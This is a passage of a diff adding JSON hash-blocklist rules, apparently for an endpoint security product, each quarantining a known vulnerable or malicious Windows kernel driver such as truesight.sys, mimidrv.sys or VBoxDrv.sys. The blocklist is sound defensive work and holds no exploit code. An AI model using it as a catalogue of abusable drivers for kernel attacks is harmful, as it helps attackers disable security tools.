+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f439300-d9ac-5abc-a628-053dd62b8304",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808595Z",
+ "creation_date": "2026-03-23T11:45:31.808597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f41efd32d4ad9bbcb688c687d7b871c3f33fd5766e28aa3f27c723b48a56bcb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f4a8211-1645-53a6-a186-588ed22d504c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469068Z",
+ "creation_date": "2026-03-23T11:45:30.469072Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469082Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00231ea698565270bf9f542e70490b7a5c6740c2da6699ab548dca0a97ca3171",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f4aea1e-c8b7-5601-bf80-da58ad6a41c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606741Z",
+ "creation_date": "2026-03-23T11:45:29.606743Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5732937c3ab5e0fd244cc1b820eaa1fb7d97110c213cd6b9dadebafe3ea853d",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f4b8d79-d903-50e6-9cb0-1a0c611fcb06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979325Z",
+ "creation_date": "2026-03-23T11:45:29.979327Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b932eab6c67f62f097a3249477ac46d80ddccdc52654f8674060b4ddf638e5d",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f549cd4-3ad9-58e6-a043-2cc5a63bef0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480079Z",
+ "creation_date": "2026-03-23T11:45:31.480083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480093Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d77b2fd954fe46be027c78597c87fa320438665240b751d788033bb183ef7761",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f58814f-50a3-5724-9693-68be040bf957",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819847Z",
+ "creation_date": "2026-03-23T11:45:30.819849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb79b99db91dc965263bd2c10ec0f58c6b8f282e0273f40c4249831b74ffec3a",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f616c5c-e1b2-5b65-acfb-249f658be918",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466692Z",
+ "creation_date": "2026-03-23T11:45:30.466695Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466704Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dc7beb60a0a6e7238fc8589b6c2665331be1e807b4d2b3ddd1c258dbbd3e2f7",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f722226-8d15-5d9c-8079-84811c5b3e6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828477Z",
+ "creation_date": "2026-03-23T11:45:31.828479Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828484Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ec7dca0815075f605a2887eae32def1d28cc09de4fac8b5033b3c0693ad210d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f72eaae-f6ae-52b6-9aa8-e6e2e7d82af1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604033Z",
+ "creation_date": "2026-03-23T11:45:29.604035Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcb8df13141708f0dd470b5411c065f8ad21688daf424bd05c94eb6e63dd08aa",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f77e5b1-8eba-5463-8715-e4770c4745a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147917Z",
+ "creation_date": "2026-03-23T11:45:31.147919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f7771ea769a351ee971b196b67cffd86afa90d7478f4e20f200b159099bcfcd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f7eeedd-6db3-5bf3-b18d-2d7c4b5099c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606421Z",
+ "creation_date": "2026-03-23T11:45:29.606423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0dc57678ba8a87ece2b2ecf0f0fc6ea2366f3f11873f478f49c9b9df8b813288",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f821312-e930-59fd-ac81-43312c234e3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452798Z",
+ "creation_date": "2026-03-23T11:45:30.452802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a2cd1dc110d014165c001ce65578da0c0c8d7d41cc1fa44f974e8a82296fc25",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f8e6708-c2d3-571a-b6ef-2e2f0451908f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809596Z",
+ "creation_date": "2026-03-23T11:45:31.809599Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809607Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "110e77c2a77d18067edafcee5c7fbd0c1240498f971e38acf5671800e4c3a667",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f9241e1-4b37-5803-afb0-06acb4d23593",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977834Z",
+ "creation_date": "2026-03-23T11:45:29.977836Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc",
+ "comment": "Vulnerable Kernel Driver (aka b4.sys) [https://www.loldrivers.io/drivers/d1441172-cc15-4a96-b782-f440bfb681e1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f927e47-26e1-59ca-b3d3-3cd5daa54b95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142308Z",
+ "creation_date": "2026-03-23T11:45:31.142310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b48564115c42432fccccba7018b6578c8ccc33da0c6b7d73f7150f0c4470e6e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f97d772-a77f-53bf-8978-2d31e85a5d11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141785Z",
+ "creation_date": "2026-03-23T11:45:31.141787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f426de2b6078727c9c7a9ac93ce9f8881cc8d2d489f80c419d9206408599764b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f98b9a1-ef14-5b38-a487-bd2041c122aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608794Z",
+ "creation_date": "2026-03-23T11:45:29.608796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608801Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "681de794238060ec929aa5cf6c4701069f113a8524d31fb2f411648968ca17de",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5f9adcba-9259-5e4d-8c35-c77d2331f244",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823621Z",
+ "creation_date": "2026-03-23T11:45:31.823624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb911ee38ebbc680eb44299e9e50f92d8995ddaa1070b3c23a71ab0566940b25",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5fab89d7-37d3-5020-86ac-8476a39553c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141981Z",
+ "creation_date": "2026-03-23T11:45:31.141983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141989Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8447afc11fdb3664885c026edc07fb909bf7ca62633b1c20d3c82e52d8f03561",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5fae421e-afb7-5024-93b6-9ba5cb0654d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.623007Z",
+ "creation_date": "2026-03-23T11:45:29.623009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.623015Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "841f965977f33d621d126412032c47dd6118251623c380e5572f7553b620b0e1",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5fb8513c-3766-515c-9275-61c56137ac4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621141Z",
+ "creation_date": "2026-03-23T11:45:29.621143Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca829178d01990c8d1d6a681dee074a53f0dd873fd8eef6f6161c682449ec8c5",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5fc33fa3-e086-5c6c-9bb1-4714010406fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147095Z",
+ "creation_date": "2026-03-23T11:45:32.147097Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7023f08c9f99076a5fb82a0f661847e2951800f095fca1793a0e6bd9c949b478",
+ "comment": "Vulnerable Kernel Driver (aka LnvMSRIO.sys) [https://blog.quarkslab.com/exploiting-lenovo-driver-cve-2025-8061.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5fd219e9-384c-5fa2-9845-c28f5c443fe8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
